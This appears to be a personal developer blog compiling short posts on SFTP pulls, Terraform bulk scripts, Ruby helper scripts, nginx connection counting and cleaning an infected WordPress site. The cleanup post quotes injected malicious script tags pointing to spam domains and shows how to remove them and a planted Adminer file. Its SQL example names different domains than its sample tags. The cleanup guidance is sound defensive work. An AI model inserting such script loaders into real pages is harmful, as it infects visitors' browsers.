Author: guda

Pull remote files from an SFTP server

These days we use the cloud for almost everything, but sometimes we still need to pull files from an SFTP server. Here are two solutions for that.

Pull and remove with sftp

This solution pulls the files and then removes them from the remote. There is a gotcha: if you expect a lot of files, there is a chance a file arrives while the “get -r …” command is executing, and the subsequent “rm *” will remove it without it ever being downloaded. So this is suitable only if you expect a few files a week/day.

Create a batch file, batchfile.sh:

get -r upload/* incoming/
rm upload/*

Then add a cron entry:

0 5 * * * /usr/bin/sftp -b batchfile.sh username@sftp-corp.company.com
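If the server grants you enough permissions, a race-safe variant is to move the whole upload directory aside before downloading, so a file arriving mid-transfer lands in a fresh upload/ and is picked up by the next run. A sketch of such a batch file (staging is a hypothetical directory name; the server must allow rename and mkdir):

```
rename upload staging
mkdir upload
get -r staging/* incoming/
rm staging/*
rmdir staging
```

Note that OpenSSH sftp batch mode aborts on the first failing command (unless it is prefixed with -), so a leftover staging directory from a failed run will abort the batch rather than mix files.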

Only pulling with lftp

When I don’t have permission to remove the files from the remote SFTP server, I use the following off-the-shelf approach.

This cron job synchronizes all files to /home/USERNAME/incoming:

0 5 * * *  /usr/bin/lftp -u USERNAME,none -e 'mirror --newer-than="now-7days" --only-newer --exclude .ssh --only-missing / /home/USERNAME/incoming; quit' sftp://sftp-corp.company.com
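Before wiring this into cron, it is worth previewing what would be transferred. lftp’s mirror command supports a --dry-run flag that only lists the actions, with the same options as above:

```
/usr/bin/lftp -u USERNAME,none -e 'mirror --dry-run --newer-than="now-7days" --only-newer --exclude .ssh --only-missing / /home/USERNAME/incoming; quit' sftp://sftp-corp.company.com
```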

Deploy the pg gem with Postgres 10

When the PostgreSQL in your distribution is stuck at an old version and you have to build against a newer one (here: the postgresql10 packages), a good way to do a Capistrano deploy is like this.

Do the system install with:

yum install postgresql10-contrib postgresql10-devel

And then in your /shared/.bundle/config add a line pointing to the location of the pg libraries:

---
BUNDLE_PATH: "/opt/application/shared/bundle"
BUNDLE_BUILD__PG: "--with-pg-config=/usr/pgsql-10/bin/pg_config"
BUNDLE_FROZEN: "true"
BUNDLE_JOBS: "4"
BUNDLE_WITHOUT: "development:test"
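For automation, the same file can be generated from a provisioning or deploy script instead of being edited by hand. A sketch, assuming the shared/.bundle location from this post (adjust the path to your Capistrano layout):

```shell
# Write the bundler config from a deploy hook; values are the ones shown above.
mkdir -p shared/.bundle
cat > shared/.bundle/config <<'EOF'
---
BUNDLE_PATH: "/opt/application/shared/bundle"
BUNDLE_BUILD__PG: "--with-pg-config=/usr/pgsql-10/bin/pg_config"
BUNDLE_FROZEN: "true"
BUNDLE_JOBS: "4"
BUNDLE_WITHOUT: "development:test"
EOF
grep BUNDLE_BUILD__PG shared/.bundle/config
```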

Thanks to my colleague Kris for finding the solution.

Organizing terraform modules in application stacks for free

One of the big challenges is how to organize your cloud account setup.

In one account, you can have a couple of application stacks. The challenge is to be able to apply/plan/destroy them quickly, without any burden.

What works for me is to use one application-terraform-bulk.sh script per application, which knows which modules belong to which stack. And when I have a couple of modules which do not belong to any particular application stack, I use a terraform_bulk.sh script which just applies all modules in the current folder.

Here is an example.

These are the ECR modules which must be present in this account. I do not care which stack will own them, so I use the general terraform_bulk.sh script.

The commands I can run are:

./terraform_bulk.sh init
# ...It will go in each folder and do terraform init
./terraform_bulk.sh plan
# ...It will go in each folder and do terraform plan
./terraform_bulk.sh apply
./terraform_bulk.sh destroy

Here is how the script looks:

#!/bin/bash
trap "exit" INT

modules=(
  anaconda
  essential
  essential-anaconda-environment
)


terraform_plan() {
  local project="$1"
  pushd .
  cd "$project"
  terraform plan
  popd
}

terraform_init() {
  local project="$1"
  pushd .
  cd "$project"
  terraform init
  popd
}

terraform_apply() {
  local project="$1"
  pushd .
  cd "$project"
  terraform apply -auto-approve
  popd
}

terraform_destroy() {
  local project="$1"
  pushd .
  cd "$project"
  terraform destroy -auto-approve
  popd
}

terraform_show() {
  local project="$1"
  pushd .
  cd "$project"
  terraform show
  popd
}


# array=(1 2 3 4)
# reverse array foo
# echo "${foo[@]}"
reverse() {
    # first argument is the array to reverse
    # second is the output array
    declare -n arr="$1" rev="$2"
    for project in "${arr[@]}"
    do
        rev=("$project" "${rev[@]}")
    done
}





case "$1" in
  init)
      for project in "${modules[@]}"
      do
        echo ""
        echo "$project"
        terraform_init "$project"
      done
      ;;

  show)
      for project in "${modules[@]}"
      do
        echo ""
        echo "$project"
        terraform_show "$project"
      done
      ;;

  apply)
      for project in "${modules[@]}"
      do
        echo ""
        echo "$project"
        terraform_apply "$project"
      done
      ;;

  destroy)
      # destroy in reverse order, so dependent modules go first
      reverse modules reversed_modules
      for project in "${reversed_modules[@]}"
      do
        echo ""
        echo "$project"
        terraform_destroy "$project"
      done
      ;;

  plan)
      for project in "${modules[@]}"
      do
        echo ""
        echo "$project"
        terraform_plan "$project"
      done
      ;;

  *)
      echo $"Usage: $0 {init|plan|show|apply|destroy}"
      exit 1

esac


In my case, the development cloud account hosts two applications, so I just create two versions of the script like this:

drwxr-xr-x 13 guda guda 4096 Nov 15 13:20 .
drwxr-xr-x  6 guda guda 4096 Nov  5 11:20 ..
drwxr-xr-x  3 guda guda 4096 Oct 28 18:14 athena
drwxr-xr-x  3 guda guda 4096 Jul 10 15:17 cm
drwxr-xr-x  5 guda guda 4096 Dec  5 22:42 ecr
drwxr-xr-x 11 guda guda 4096 Oct 28 18:39 endpoints
-rwxr-xr-x  1 guda guda 2345 Oct 28 18:38 essential-terraform_bulk.sh <<<<<
-rwxr-xr-x  1 guda guda 2190 Oct 28 18:14 etl_monitoring-terraform_bulk.sh <<<<<
drwxr-xr-x  3 guda guda 4096 Nov  5 11:24 fargate_essential
drwxr-xr-x  3 guda guda 4096 Oct 28 18:47 rds
drwxrwxr-x  3 guda guda 4096 Sep  3 19:48 s3
drwxr-xr-x  5 guda guda 4096 Oct 28 18:47 secret_manager
drwxr-xr-x  3 guda guda 4096 Aug 15 17:02 vpc
drwxr-xr-x  4 guda guda 4096 Nov 15 13:20 vpc_peering
drwxr-xr-x  3 guda guda 4096 Aug 19 14:51 zone_security_groups

So when I want to provision:

  • essential app – use essential-terraform_bulk.sh
  • etl monitoring app – use etl_monitoring-terraform_bulk.sh
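Each application variant is the same bulk script with only the modules array at the top swapped out. A sketch (the module names here are illustrative, not the real stacks):

```shell
# essential-terraform_bulk.sh differs from terraform_bulk.sh only in its
# module list; everything below the array is identical.
modules=(
  vpc
  zone_security_groups
  rds
  fargate_essential
)
echo "managing ${#modules[@]} modules"
```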

Be aware when you have to share resources – for example the VPC: you do not want the first application's terraform bulk script to destroy a resource which is still needed by the second application's stack.

Switch configuration lines using comments

Recently I had a case where I have to use a base Docker image from either a remote or a local repository. I like to keep the configuration close, and I don't want a couple of configuration files with the same content, so I decided to write a simple program which does the config switch and then switches it back (if needed).

Here is an example of usage:

When I build the images locally I want to use:

FROM anaconda-environment:latest

When I build from our CI/CD server I want to use the remote ECR:

CONFIG->remote-images:FROM XXXXXXXXXXX.dkr.ecr.us-east-1.amazonaws.com/anaconda-environment:latest

Then, in the Dockerfile, I put these lines:

# CONFIG->local-images:FROM anaconda-environment:latest
# CONFIG->remote-images:FROM XXXXXXXXXXX.dkr.ecr.us-east-1.amazonaws.com/anaconda-environment:latest
FROM anaconda-environment:latest
ENV ACCEPT_INTEL_PYTHON_EULA=yes
.... and so on...

And here is how the config is switched to point to the remote images:

ruby switch-config.rb Dockerfile remote-images

and this is how it is switched back to the local images:

ruby switch-config.rb Dockerfile local-images

So far I haven’t found any drawbacks to this approach. But surely there are some – please let me know if you hit one.

And here is the code…

#!/usr/bin/env ruby

# Usage: ruby switch-config.rb Dockerfile remote-images
#
# Looks for comment blocks like the one below and replaces the active line
# with the option belonging to the requested environment key:
#
# # CONFIG->local-images:FROM anaconda-environment:latest
# # CONFIG->remote-images:FROM XXXXXXXXXXX.dkr.ecr.us-east-1.amazonaws.com/anaconda-environment:latest
# FROM anaconda-environment:latest

file = ARGV[0] || "Dockerfile"
desired_environment = ARGV[1] || "local"
lines = File.read(file).split("\n")
# Matches "# CONFIG->KEY:content" and captures the key and the content
tag = /\s*?#\s+CONFIG->([\w\-]+?):(.*)\Z/
new_lines = []
key_found = true
options = {} # environment key => config line content
found_config_lines = false

lines.each do |line|
  if line =~ tag
    environment_key = $1
    option = $2
    options[environment_key] = option
    found_config_lines = true
  end

  # The first line after a CONFIG block that matches one of the collected
  # options is the active line - swap it for the desired environment's option.
  if found_config_lines && options.values.include?(line)
    key_found = options.key?(desired_environment)
    new_lines << options[desired_environment]
    found_config_lines = false
    options = {}
  else
    new_lines << line
  end
end

if key_found
  File.write(file, new_lines.join("\n"))
else
  puts "Something is wrong - key not found! The syntax for defining options is:"
  puts "# CONFIG->KEY:The content of this option"
end

Saboteur – Rules (in Bulgarian)

Saboteur by Frederic Moyersoen

Link to the English version:


How to clean a WordPress website

This works for infections with *.buyittraffic.com and *.gotosecond2.com.

If you have an ancient WordPress 4.1.1 and your website has become a victim of cross-site scripting, here is how to clean it.

First, update your WordPress to a version which is not vulnerable; such a version is 4.1.28, which can be downloaded from here.

In my case the victim was http://www.YOURWEBSITE.com/ and the links were changed to go to http://land.buyittraffic.com.

Fix the Links

Go to the MySQL CLI or your phpMyAdmin and restore the website URL and your home page URL:

UPDATE wp_options SET option_value = 'http://www.YOURWEBSITE.com/' WHERE `wp_options`.`option_name` = 'siteurl';

UPDATE wp_options SET option_value = 'http://www.YOURWEBSITE.com/' WHERE `wp_options`.`option_name` = 'home';

This will fix the links on the website, and the administration will start to work again.

At this point, you can open your website but DO NOT CLICK on any link. All posts/pages are infected.

Fix the content

Nasty JavaScript has been appended to all of them, and you have to clean it. To find the malware code which has to be deleted, run a curl command to see the HTML of a page. Copy one page/post URL and check the source with curl:

curl https://www.YOURWEBSITE.com/page?id=123

You will see something like this at the end:

<script src='https://js.greenlabelfrancisco.com/clizkes' type='text/javascript'></script>
<script src='https://dl.gotosecond2.com/clizkes' type='text/javascript'></script>

Then run a REPLACE like this in the MySQL console, using the exact script tags you found with curl:


UPDATE wp_posts 
  SET post_content = REPLACE(post_content,
      "<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script><script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script><script src='https://land.buyittraffic.com/clizkes' type='text/javascript'></script>",
      '');
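To check how many posts still carry the injected tag before and after the cleanup, a count helps (wp_posts is the default table name; 'clizkes' is the marker from the script URLs seen above):

```
SELECT COUNT(*) FROM wp_posts WHERE post_content LIKE '%clizkes%';
```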


Check whether the nasty code is still there with:

curl http://www.YOURWEBSITE.com/

If you don’t see the malware then it is safe to open in the browser again.

Check for Adminer

Check whether your site contains a remote administration PHP file (Adminer):

grep -lri Adminer wordpress/

In my case the file was named ad.php

Delete it!

Happy 2020!

Script to open a pull request on github from the current branch

When you push a new branch to GitHub from the command line, you’ll notice a URL within the output which you can copy in order to quickly open a new pull request.

But if you are on an old branch… then nothing will help you.

And I was tired of opening the GitHub website, so here it is: a small Ruby script which opens my browser at the correct place on GitHub.

#!/usr/bin/env ruby

# Find the currently checked out branch (the one marked with "*")
output = `git branch`
selected_branch = output.split("\n").find { |element| element =~ /^\*/ }
current_branch = selected_branch.split(' ').last

# Take the push URL of the "origin" remote
remote = `git remote -v`.split("\n").find { |element| element =~ /origin\s.*?push\)$/ }.split(' ')[1]

# Turn git@github.com:user/repo.git into github.com/user/repo
githost = remote.gsub('git@', '').gsub(/\.git$/, '').gsub(/^github.com:/, 'github.com/')

`chromium-browser https://#{githost}/compare/#{current_branch}?expand=1`

This version supports sub-modules.

Bonus: a script to open the current GitHub repo in the browser

#!/usr/bin/env ruby

# Take the push URL of the "origin" remote
remote = `git remote -v`.split("\n").find { |element| element =~ /origin\s.*?push\)$/ }.split(' ')[1]

# Turn git@github.com:user/repo.git into github.com/user/repo
githost = remote.gsub('git@', '').gsub(/\.git$/, '').gsub(/^github.com:/, 'github.com/')

`chromium-browser https://#{githost}/`

Great notes on development

https://blog.juliobiason.net/thoughts/things-i-learnt-the-hard-way/

The meaning of “phlpwcspweb3” or why you should not do abbreviations in the code

“phlpwcspweb3” is found in the “Amazon Web Services – Tagging Best Practices”.

From what I can see, this is something related to the web, and there are probably at least 3 instances of that kind.

According to AWS, this should be a meaningful hostname.

If you have decoded it, you probably do not need to read further…


HTTPS Connections counting

Here is how one can set up nginx to count the HTTPS connections made.

Preparation

Create a new folder

mkdir ~/docker_ssl_proxy
cd ~/docker_ssl_proxy

Put a dummy entry in your /etc/hosts file

127.0.0.1 YOURDOMAIN.com

Steps

First, generate a certificate:

openssl req -subj '/CN=YOURDOMAIN.com' -x509 -newkey rsa:4096 -nodes -keyout key.pem -out cert.pem -days 365

Then create a new file something.conf with the following content:

server {
  listen 4000 ssl;
  ssl_certificate /etc/nginx/conf.d/cert.pem;
  ssl_certificate_key /etc/nginx/conf.d/key.pem;

  # access_log /dev/stdout;
  access_log  /var/log/nginx/access.log;
  error_log /var/log/nginx/error.log;

  location / {
      return 200 'With style!';
      add_header Content-Type text/plain;
  }
}

Then run the docker with

docker run --rm -v `pwd`/logs:/var/log/nginx -v `pwd`:/etc/nginx/conf.d -p 4000:4000 nginx

Get the CA cert, so curl can trust the self-signed certificate:

echo quit | openssl s_client -showcerts -servername YOURDOMAIN.com -connect YOURDOMAIN.com:4000 > cacert.pem
curl --cacert cacert.pem https://YOURDOMAIN.com:4000/ -d 'hello world'

And finally, make some connections:

go-wrk  -c=400 -t=8 -n=10000 -m="POST" -b='{"accountID":"1"}'  -i https://YOURDOMAIN.com:4000
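And the actual counting: each request is one line in the access log that the docker volume exposes under logs/. A sketch, with two sample log lines standing in for real traffic so the commands run standalone:

```shell
# Two sample entries in the default "combined" log format; with the real
# setup above, logs/access.log is filled by nginx instead.
mkdir -p logs
printf '%s\n' \
  '127.0.0.1 - - [01/Jan/2020:00:00:01 +0000] "POST / HTTP/1.1" 200 11 "-" "go-wrk"' \
  '127.0.0.1 - - [01/Jan/2020:00:00:02 +0000] "POST / HTTP/1.1" 200 11 "-" "go-wrk"' \
  > logs/access.log

# total requests served
wc -l < logs/access.log

# requests per HTTP status (field 9 of the combined log format)
awk '{print $9}' logs/access.log | sort | uniq -c
```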


© 2020 Gudasoft
